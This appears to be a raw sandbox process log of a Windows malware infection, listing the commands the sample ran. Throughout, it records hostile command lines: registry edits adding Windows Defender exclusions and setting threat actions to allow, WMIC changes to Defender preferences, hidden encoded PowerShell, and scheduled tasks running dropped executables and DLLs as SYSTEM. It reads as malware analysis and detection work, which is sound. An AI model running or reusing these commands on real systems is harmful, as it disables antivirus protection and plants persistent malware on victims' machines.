C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵PID:632
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵PID:2124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:323⤵PID:8036
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:643⤵PID:60
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:323⤵PID:8672
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:643⤵PID:6384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:323⤵PID:7244
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:643⤵PID:5588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:323⤵PID:7312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:643⤵PID:8164
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:323⤵PID:6796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:643⤵PID:8804
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵PID:6352
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵PID:6408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:8084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:323⤵PID:2556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:643⤵PID:8852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵PID:7980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵PID:7720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:323⤵PID:3552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:643⤵PID:2100
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵PID:6764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵PID:7480
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggLHNEnxv" /SC once /ST 02:17:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:7492 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggLHNEnxv"2⤵PID:6272
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggLHNEnxv"2⤵PID:9064
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 03:52:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\vJkRBwz.exe\" XT /HNsite_idVbZ 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6404 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵PID:6148
-
C:\Program Files (x86)\GameServerClient\GameService.exe"C:\Program Files (x86)\GameServerClient\GameService.exe"1⤵PID:6416
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:5972
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:8984
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:9160
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:5108
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:7212
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:836
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:8336
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:8820
-
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"2⤵PID:7936
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4040
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7036
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3552
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7620
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4384
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\QlVsVPc.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\QlVsVPc.exe em /ghsite_idlGh 385118 /S1⤵PID:8364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
PID:6272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:7140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6748
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:7876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:7648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:8992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:9052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:504
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:7288
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3252
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:8712
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:8848
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:7596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:8040
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:8668
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:7252
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6268
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:8492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:8880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4336
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:6432
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:6676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:8392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:8088
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 08:03:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\XAafaZk.exe\" XT /Yqsite_idxzN 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:9152 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7208
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:8396
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\vJkRBwz.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\vJkRBwz.exe XT /HNsite_idVbZ 385118 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:8348 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵PID:7364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:8232
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:3392
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:8268
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:8648
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:9096
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\jrnUEs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:7656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\eAdolTj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qbSDwEgyNYPZlGA"2⤵PID:7808
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"2⤵PID:2180
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\YgbXKPO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3428 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:9064
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\XsVIPHh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8264 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\AeKbcvd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:7364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\ouPcZlZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7656
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"2⤵PID:8708
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\XAafaZk.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\XAafaZk.exe XT /Yqsite_idxzN 385118 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:7380 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵PID:840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6756
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2452
-
